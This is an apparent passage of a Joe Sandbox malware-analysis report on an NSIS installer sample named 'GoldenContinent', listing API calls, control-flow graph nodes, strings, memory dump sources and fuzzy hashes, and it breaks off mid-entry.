                                                                                                                                                                                                                                                                            • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                              • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                            • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                            • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                            • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                            • API String ID: 608394941-2746725676
                                                                                                                                                                                                                                                                            • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                            • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,WesternJpg,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,WesternJpg,WesternJpg,00000000,00000000,WesternJpg,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00429E6D,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00429E6D,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00429E6D,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                            • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$WesternJpg
                                                                                                                                                                                                                                                                            • API String ID: 4286501637-2353217261
                                                                                                                                                                                                                                                                            • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                            • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

Control-flow Graph (first node 4035b3-403601; graph not reproduced)
APIs
• GetTickCount.KERNEL32 ref: 004035C4
• GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
  • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
  • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
• GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
Strings
• Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
• Null, xrefs: 004036AA
• Inst, xrefs: 00403698
• Error launching installer, xrefs: 00403603
• soft, xrefs: 004036A1
Memory Dump Source
• Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
Similarity
• API ID: File$AttributesCountCreateModuleNameSizeTick
• String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
• API String ID: 4283519449-527102705

Control-flow Graph (first node 40337f-403398; graph not reproduced)
APIs
• GetTickCount.KERNEL32 ref: 004033F1
• GetTickCount.KERNEL32 ref: 00403492
• MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
• wsprintfW.USER32 ref: 004034CE
• WriteFile.KERNELBASE(00000000,00000000,00429E6D,00403792,00000000), ref: 004034FF
• WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
Strings
Memory Dump Source
• Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
Similarity
• API ID: CountFileTickWrite$wsprintf
• String ID: (]C$... %d%%$pAB
• API String ID: 651206458-3635341587

Control-flow Graph (first node 404f9e-404fb1; graph not reproduced)
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00445D80,00429E6D,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(004034E5,00445D80,00429E6D,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00429E6D,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00429E6D,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2740478559-0

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f7b GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 750 4030e3-4030f2 732->750 751 402387-40238d GlobalFree 732->751 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 742->750 762 402708-40270e 747->762 751->750 762->750
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                            • GlobalFree.KERNELBASE(00806460), ref: 00402387
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                            • String ID: Exch: stack < %d elements$Pop: stack empty$WesternJpg
                                                                                                                                                                                                                                                                            • API String ID: 1459762280-3247540519

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            control_flow_graph 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW 767 4030e3-4030f2 764->767 768 40232b-402339 GlobalAlloc 764->768 768->767 770 40233f-40234e GetFileVersionInfoW 768->770 772 402350-402367 VerQueryValueW 770->772 773 402384-40238d GlobalFree 770->773 772->773 774 402369-402381 call 405f7d * 2 772->774 773->767 774->773
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                            • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                            • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                              • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                            • GlobalFree.KERNELBASE(00806460), ref: 00402387
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3376005127-0

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            control_flow_graph 780 402b23-402b37 GlobalAlloc 781 402b39-402b49 call 401446 780->781 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 780->782 787 402b70-402b73 781->787 782->787 788 402b93 787->788 789 402b75-402b8d call 405f96 WriteFile 787->789 791 4030e3-4030f2 788->791 789->788 795 402384-40238d GlobalFree 789->795 795->791
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                            • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                            • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                            • String ID: <RM>$WesternJpg$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                                                            • API String ID: 247603264-3518307370
                                                                                                                                                                                                                                                                            • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                            • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            control_flow_graph 818 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 829 402223-4030f2 call 4062cf 818->829 830 40220d-40221b call 4062cf 818->830 830->829
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00429E6D,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00429E6D,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00429E6D,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                            • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                            • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                            • API String ID: 3156913733-2180253247
                                                                                                                                                                                                                                                                            • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                            • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            control_flow_graph 838 405eab-405eb7 839 405eb8-405eec GetTickCount GetTempFileNameW 838->839 840 405efb-405efd 839->840 841 405eee-405ef0 839->841 843 405ef5-405ef8 840->843 841->839 842 405ef2 841->842 842->843
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                            • String ID: nsa
                                                                                                                                                                                                                                                                            • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                            • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                            • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                            • String ID: HideWindow
                                                                                                                                                                                                                                                                            • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                            • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                            • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                            • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                            • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 415043291-0
                                                                                                                                                                                                                                                                            • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                            • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                            Memory Dump Source
